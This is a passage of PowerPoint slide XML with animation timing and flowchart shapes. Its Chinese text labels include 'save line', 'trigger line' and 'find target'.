              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1547813" y="1916113"/>
            <a:ext cx="1079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kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>保存线</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="283661" name="Text Box 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3A7995E-A72B-4357-BA9A-3A90358354E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4068763" y="1916113"/>
            <a:ext cx="1079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kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>触发线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83651"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="box(out)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="283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283655"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="283655"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="283655"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="283655"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="15" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="16" presetID="8" presetClass="entr" presetSubtype="16" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="283652"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="diamond(in)">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2836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5" presetClass="entr" presetSubtype="0" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="283656"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="283656"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="283656"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="283656"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="26" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="27" presetID="8" presetClass="entr" presetSubtype="16" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="283653"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="diamond(in)">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28365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283657"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="283657"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="283657"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="283657"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="37" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="38" presetID="8" presetClass="entr" presetSubtype="16" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="283654"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="diamond(in)">
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2836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5" presetClass="entr" presetSubtype="0" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="283659"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="283659"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="46" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="283659"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="283659"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="48" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="49" presetID="27" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="50000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="283660"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="discrete" valueType="clr">
                                      <p:cBhvr override="childStyle">
                                        <p:cTn id="51" dur="80"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="283660"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:clrVal>
                                              <a:schemeClr val="accent2"/>
                                            </p:clrVal>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:clrVal>
                                              <a:schemeClr val="hlink"/>
                                            </p:clrVal>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="discrete" valueType="clr">
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="80"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="283660"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fillcolor</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:clrVal>
                                              <a:schemeClr val="accent2"/>
                                            </p:clrVal>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:clrVal>
                                              <a:schemeClr val="hlink"/>
                                            </p:clrVal>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="53" dur="80"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="283660"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fill.type</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="solid"/>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55" presetClass="entr" presetSubtype="0" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="283658"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="58" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="283658"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="59" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="283658"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="60" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="283658"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="61" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="62" presetID="27" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="50000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="63" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="283661"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="discrete" valueType="clr">
                                      <p:cBhvr override="childStyle">
                                        <p:cTn id="64" dur="80"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="283661"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:clrVal>
                                              <a:schemeClr val="accent2"/>
                                            </p:clrVal>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:clrVal>
                                              <a:schemeClr val="hlink"/>
                                            </p:clrVal>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="discrete" valueType="clr">
                                      <p:cBhvr>
                                        <p:cTn id="65" dur="80"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="283661"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fillcolor</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:clrVal>
                                              <a:schemeClr val="accent2"/>
                                            </p:clrVal>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:clrVal>
                                              <a:schemeClr val="hlink"/>
                                            </p:clrVal>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="66" dur="80"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28366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1" grpId="0" animBg="1"/>
      <p:bldP spid="283652" grpId="0" animBg="1"/>
      <p:bldP spid="283653" grpId="0" animBg="1"/>
      <p:bldP spid="283654" grpId="0" animBg="1"/>
      <p:bldP spid="283660" grpId="0"/>
      <p:bldP spid="283661"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AutoShape 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5451F0E7-E940-4309-9DB4-57BD2CDE9155}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="612775" y="117475"/>
            <a:ext cx="863600" cy="1439863"/>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寻找目标</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="154627" name="AutoShape 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C122854-3E03-4B2A-99BC-12FAFE5D864C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="284480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154628" name="AutoShape 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0EE0741-4853-479F-B97E-D58400E8F575}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="536575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4629" name="AutoShape 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44FFD71D-8A8D-49AA-8812-299056890EC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7453313"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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="154630" name="AutoShape 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DB1FB2D-D942-448B-B408-5042F6D08DBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="154626" idx="3"/>
            <a:endCxn id="154627" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1476375" y="836613"/>
            <a:ext cx="1368425" cy="1587"/>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4631" name="AutoShape 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56714FA6-B769-4D2E-955B-8D450EB0189B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="154627" idx="3"/>
            <a:endCxn id="154628" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3708400" y="836613"/>
            <a:ext cx="1657350"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4632" name="AutoShape 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E29B528-17C7-40A9-A61D-643BA9A7774F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="154628" idx="3"/>
            <a:endCxn id="154629" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6229350" y="836613"/>
            <a:ext cx="1223963"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sp>
        <p:nvSpPr>
          <p:cNvPr id="154633" name="Line 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19496981-D4CA-4931-9B99-3244F33732AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4500563" y="-100013"/>
            <a:ext cx="0" cy="2016126"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">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4682" name="AutoShape 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B838CEA-2C91-4EAD-824C-CECA1296361A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="611188"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寻找目标</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="154635" name="AutoShape 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E83CA19-0C6C-4832-AE70-500A9C861498}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="284321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154636" name="AutoShape 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05E64D00-3079-47AC-AAA0-ED8F5B50186D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="536416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4637" name="AutoShape 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60F3EBFC-3CBF-4C67-8EDD-E6425C69AB42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
